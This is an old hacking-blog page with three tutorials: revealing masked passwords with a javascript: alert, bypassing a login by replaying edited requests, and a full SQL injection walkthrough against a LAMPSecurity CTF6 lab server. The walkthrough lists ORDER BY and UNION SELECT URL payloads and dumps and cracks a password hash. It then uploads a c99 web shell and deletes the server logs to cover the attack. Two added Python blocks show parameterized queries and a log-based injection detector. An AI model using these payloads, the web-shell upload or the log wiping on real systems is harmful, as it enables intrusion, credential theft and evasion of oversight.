Tuesday 30 August 2011

Reveal ***** (Asterisk) Passwords Using JavaScript - N00b Friendly


Want to reveal the passwords hidden behind asterisks (****)?


Follow the steps given below:


1) Open the login page of any website (e.g. http://mail.yahoo.com).


2) Type your username and password.


3) Copy and paste the JavaScript code given below into your browser's address bar and press Enter.


    javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press Enter, a window pops up showing the password you typed!


Note: This trick may not work with Firefox. The id 'Passwd' is the one the Yahoo login page in the example gives its password field; other sites use a different id for that field.

Thursday 25 August 2011

Login Form Bypass using Mantra Security Toolkit

Hi All,

In this tutorial we will try to bypass the login form of a vulnerable website using the Mantra Security Toolkit.

What you need

1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6.


Let's begin.

Step 1:

I'm on the home page of the website now:

http://192.168.132.128/

[Image: mantrasecuritytoolkit1.jpg]


Step 2:

The login form of the website:

http://192.168.132.128/?action=login

[Image: mantrasecuritytoolkit2.jpg]


Step 3:

Now we will test the input fields for SQL injection. For that we can use the SQL Inject Me tool. It can be launched from Tools > SQL Inject Me > Open SQL Inject Me Sidebar.

[Image: mantrasecuritytoolkit3.jpg]


Step 4:

You can see the SQL Inject Me sidebar on the right.

[Image: mantrasecuritytoolkit4.jpg]


Step 5:

I'm checking all the fields to test.

[Image: mantrasecuritytoolkit5.jpg]


Step 6:

I clicked on "Test all forms with all attacks".

[Image: mantrasecuritytoolkit6.jpg]


Step 7:

The test results say that none of the fields are vulnerable to SQL injection. So it appears the website is sanitizing the input.

[Image: mantrasecuritytoolkit7.jpg]



Step 8:

Now we will try to see what type of sanitizing mechanism the website employs. For that we will use Firebug. It can be launched by going to Tools > Firebug > Open Firebug.

[Image: mantrasecuritytoolkit9.jpg]



Step 9:

Now that Firebug is open, I'm enabling Firebug's Inspect mode by clicking on the inspect icon (the second one) in the top left corner.

[Image: mantrasecuritytoolkit10.jpg]



Step 10:

I clicked on the login form and Firebug highlighted the corresponding source code. It shows that some local JavaScript is used to sanitize the input.

[Image: mantrasecuritytoolkit11.jpg]



Step 11:

For bypassing it we will use Live HTTP Headers: JavaScript that runs in the browser can only filter what the form itself submits, not a request that is replayed with edited values. It can be launched either from the sidebar or by going to Tools > Live HTTP Headers.

[Image: mantrasecuritytoolkit12.jpg]



Step 12:

Now you can see Live HTTP Headers. The Capture check box must be checked.

[Image: mantrasecuritytoolkit13.jpg]



Step 13:

I went back to the login form, entered some sample values there and pressed Log In.

[Image: mantrasecuritytoolkit14.jpg]


Step 14:

Now I went back to Live HTTP Headers again. We can clearly see that it captured the session.

[Image: mantrasecuritytoolkit15.jpg]



Step 15:

I scrolled up to find the entry with the username and password data fields. I clicked on it and pressed the Replay button.

[Image: mantrasecuritytoolkit16.jpg]



Step 16:

I'm changing the value a little bit to bypass the authentication and clicking on the Replay button.

[Image: mantrasecuritytoolkit17.jpg]


Step 17:

Hmmm. I got an error message. Looks like I should modify the injected code.

[Image: mantrasecuritytoolkit18.jpg]

Step 18:

I modified the code.

[Image: mantrasecuritytoolkit19.jpg]


Step 19:

No luck.

[Image: mantrasecuritytoolkit20.jpg]


Step 20:

I changed the value again and pressed the Replay button.

[Image: mantrasecuritytoolkit21.jpg]


Step 21:

Voila. I'm successfully authenticated.

[Image: mantrasecuritytoolkit22.jpg]


Step 22:

Now I have admin access.

[Image: mantrasecuritytoolkit23.jpg]

If you wish to completely root the whole server, you can go to this post and follow the steps from step 24.

Wednesday 24 August 2011

Advanced SQL Injection Tutorial - Complete website rooting

Hi All,

In this tutorial we will be rooting a vulnerable web server using the Mantra Security Toolkit.

What you need

1. Mantra Security Toolkit - Download

2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6.

3. Any PHP shell you are comfortable with
- Google for "c99 shell"

Now the process:


Step 1:

I'm on the home page of the website now:


http://192.168.132.128/

[Image: mantrahackbar1.jpg]


Step 2:

I went through all the pages of the website and found a page that takes a parameter in the URL:


http://192.168.132.128/?id=13

[Image: mantrahackbar2.jpg]


Step 3:

I launched Hackbar by pressing F9.

[Image: mantrahackbar3.jpg]


Step 4:

The power of a single quote. I'm checking whether the website is vulnerable or not by putting a ' at the end of the URL and pressing Execute.



http://192.168.132.128/?id=13'

[Image: mantrahackbar4.jpg]

Since the page content is different from the previous one, I can conclude that the web page is vulnerable.


Step 5:

Let's find out the number of columns the query returns.



http://192.168.132.128/?id=13 order by 1

[Image: mantrahackbar6.jpg]


Step 6:

I have to keep on increasing the last number till I see any change in the page. In usual practice this is going to be a tedious task when the query returns many columns. But with this tool I can simply press the + button till I see a change on the web page.



http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar7.jpg]



Step 7:

I went up to 7 and there is no change so far.



http://192.168.132.128/?id=13 order by 7

[Image: mantrahackbar12.jpg]



Step 8:

I'm on 8 now and I can see the page changed.



http://192.168.132.128/?id=13 order by 8

[Image: mantrahackbar13.jpg]



Step 9:

Now let's go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT.

[Image: mantrahackbar14.jpg]



Step 10:

I provided the number of columns. Since I got a different page at 8, I can be sure that column 8 does not exist and there are only 7 columns.

[Image: mantrahackbar16.jpg]



Step 11:

Wonderful. I can see some numbers on the page now. Those are the vulnerable columns, the ones whose content gets displayed on the page. Let's take number 2.



http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7


[Image: mantrahackbar19.jpg]



Step 12:

I replaced the number 2 in the URL with another SQL expression; it got executed and the result is displayed on the page.

http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7

[Image: mantrahackbar21.jpg]

The current user is cms_user@localhost.



Step 13:

Let's find out the version of the database. I replaced 2 in the URL with the version() function.

http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7

[Image: mantrahackbar22.jpg]

The version is 5.0.45.



Step 14:

Let me list all the tables.

http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tables

[Image: mantrahackbar23.jpg]

From this list I found that "user" is an interesting table.



Step 15:

Now I listed all the columns, and it's a big list.

http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns

[Image: mantrahackbar24.jpg]



Step 16:

I want the columns from the table "user" and nothing else.

http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'

[Image: mantrahackbar25.jpg]



Step 17:

Let's find the user name.

http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user

[Image: mantrahackbar27.jpg]



Step 18:

Now, what about the password?

http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user

[Image: mantrahackbar26.jpg]

It's hashed rather than encrypted: an unsalted MD5 hash, which is why a plain lookup is enough in the next step.
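The login form in the Login Form Bypass post above and the ?id= page in Steps 4 to 18 here fail the same way: user input is spliced into the SQL text, and JavaScript in the browser cannot prevent that because the request can be replayed. As an added example (not the CTF's code), a constructed sqlite3 stand-in for the CMS query, with 3 columns instead of 7 and a placeholder hash, run with the post's own inputs against a concatenated query and a parameterized one:

```python
import sqlite3

# Constructed stand-in for the CMS database behind "?id=" and the login
# form: 3 columns instead of the post's 7, and a placeholder hash value.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE article (id INTEGER, title TEXT, body TEXT)")
    db.execute("INSERT INTO article VALUES (13, 'Welcome', 'hello')")
    db.execute("CREATE TABLE user (user_username TEXT, user_password TEXT)")
    db.execute("INSERT INTO user VALUES ('admin', 'placeholder-md5-hash')")
    return db

def get_article_vulnerable(db, article_id):
    # Concatenation: whatever follows "?id=" becomes part of the SQL text,
    # so ORDER BY probes and UNION SELECTs run exactly as typed.
    sql = "SELECT id, title, body FROM article WHERE id = " + article_id
    return db.execute(sql).fetchall()

def get_article_safe(db, article_id):
    # Placeholder binding: the value is data, so "13 UNION SELECT ..." is
    # just a string that matches no id. No client-side JavaScript involved.
    sql = "SELECT id, title, body FROM article WHERE id = ?"
    return db.execute(sql, (article_id,)).fetchall()

def login_safe(db, username, password_hash):
    # Same rule for the login form: both fields are bound, never spliced.
    sql = ("SELECT 1 FROM user WHERE user_username = ? "
           "AND user_password = ?")
    return db.execute(sql, (username, password_hash)).fetchone() is not None

def probe(db, fn, value):
    # Returns ("rows", rows) or ("error", message), mirroring the
    # "page changed or not" signal the post watches for in Steps 4 to 8.
    try:
        return ("rows", fn(db, value))
    except sqlite3.OperationalError as err:
        return ("error", str(err))

if __name__ == "__main__":
    db = make_db()
    for value in ("13", "13'", "13 order by 8",
                  "13 UNION SELECT 1,user_username,user_password FROM user"):
        print(repr(value))
        print("  vulnerable:", probe(db, get_article_vulnerable, value))
        print("  safe:      ", probe(db, get_article_safe, value))
```

The concatenated version errors on the quote and on ORDER BY 8 and returns the user table on the UNION; the bound version returns the article for "13" and an empty result for every probe.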



Step 19:

Looking up the password hash. I copied the MD5 hash, pasted it into Hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com.

[Image: mantrahackbar30.jpg]



Step 20:

Voila! I got the password.

[Image: mantrahackbar31.jpg]



Step 21:

Finding the login page. It was right in front of me.

[Image: mantrahackbar32.jpg]



Step 22:

Logging in with the credentials I have.

[Image: mantrahackbar33.jpg]



Step 23:

Greetings!

[Image: mantrahackbar35.jpg]



Step 24:

I'm an admin now. Look at my powers.

[Image: mantrahackbar36.jpg]



Step 25:

Let me add an event.

[Image: mantrahackbar37.jpg]



Step 26:

And of course I want to upload a picture.

[Image: mantrahackbar38.jpg]



Step 27:

Let's see whether it allows me to upload the shell or not.

[Image: mantrahackbar39.jpg]



Step 28:

Now I'm pressing the "Add Event" button.

[Image: mantrahackbar40.jpg]



Step 29:

Nice. Looks like it got uploaded.

[Image: mantrahackbar41.jpg]



Step 30:

Let's see where the shell got uploaded to.

[Image: mantrahackbar42.jpg]



Step 31:

I'm trying the default upload location.

[Image: mantrahackbar43.jpg]

[Image: mantrahackbar44.jpg]



Step 32:

Looks like I got it.

[Image: mantrahackbar45.jpg]

Let me click on the c9shell.php file I just uploaded.



Step 33:

Voila. I have shell access.

[Image: mantrahackbar46.jpg]



Step 34:

I simply clicked on the up button to get to the root folder.

[Image: mantrahackbar48.jpg]

Now I can do whatever I wish: deface the website, maintain access, or whatever. But that's out of the scope of the current tutorial.



Step 35:

What I'm interested in is the log folder.

[Image: mantrahackbar49.jpg]




Step 36:

I clicked on the log.log file, and it has the logs of my noisy SQL injection attacks.

[Image: mantrahackbar51.jpg]



Step 37:

Let me go back and edit the log file.

[Image: mantrahackbar52.jpg]

[Image: mantrahackbar53.jpg]



Step 38:

I deleted all the log entries. Now saving it.

[Image: mantrahackbar54.jpg]



Step 39:

Nice. The log file is empty now.

[Image: mantrahackbar56.jpg]
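The log.log file in Step 36 recorded every probe from Steps 4 to 18, and Steps 37 to 39 show why such a record has to be shipped off the host before an intruder with a web shell can edit it. As an added example (not from the post), a detector over constructed Apache-style access-log lines that decodes the query string, matches the probe patterns the post walks through, and groups them by source address; the log lines and the 192.168.132.1 client address are made up for the demo:

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined format, one probe per line)
# modelled on the URLs in Steps 4 to 18; not taken from the post's log.log.
SAMPLE_LOG = """\
192.168.132.1 - - [24/Aug/2011:10:01:02 +0000] "GET /?id=13 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.132.1 - - [24/Aug/2011:10:01:09 +0000] "GET /?id=13%27 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.168.132.1 - - [24/Aug/2011:10:02:15 +0000] "GET /?id=13+order+by+8 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.168.132.1 - - [24/Aug/2011:10:03:40 +0000] "GET /?id=13+UNION+SELECT+1,user(),3,4,5,6,7 HTTP/1.1" 200 5200 "-" "Mozilla/5.0"
192.168.132.1 - - [24/Aug/2011:10:05:01 +0000] "GET /?action=login HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Probe patterns from the post; matched after decoding so %27 and + cannot hide them.
RULES = {
    "quote-probe": re.compile(r"'"),
    "order-by-enum": re.compile(r"\border\s+by\s+\d+", re.I),
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema-read": re.compile(r"information_schema\.", re.I),
}

def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return {"ip": ip, "ts": ts, "method": method,
            "path": unquote_plus(path), "status": int(status)}

def flag_sqli(log_text):
    # Returns (ip, decoded path, [rule names]) for every line that matches.
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        names = [n for n, rx in RULES.items() if rx.search(rec["path"])]
        if names:
            hits.append((rec["ip"], rec["path"], names))
    return hits

def count_by_ip(hits):
    # Several distinct rules from one source is the ORDER BY / UNION walkthrough,
    # not a stray apostrophe in a search box.
    per_ip = {}
    for ip, _path, names in hits:
        per_ip.setdefault(ip, set()).update(names)
    return {ip: sorted(rules) for ip, rules in per_ip.items()}
```

Run over a copy of the log that lives on a separate log host, these hits survive even after Step 38 empties the original file.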



Step 40:

Now let's remove the c99 shell by pressing Self Remove.

[Image: mantrahackbar57.jpg]



Step 41:

Confirmed!

[Image: mantrahackbar58.jpg]



Step 42:

OK. Goodbye C99.

[Image: mantrahackbar59.jpg]



Step 43:

Well. It deleted itself.

[Image: mantrahackbar60.jpg]



H4qqy H4ck!ng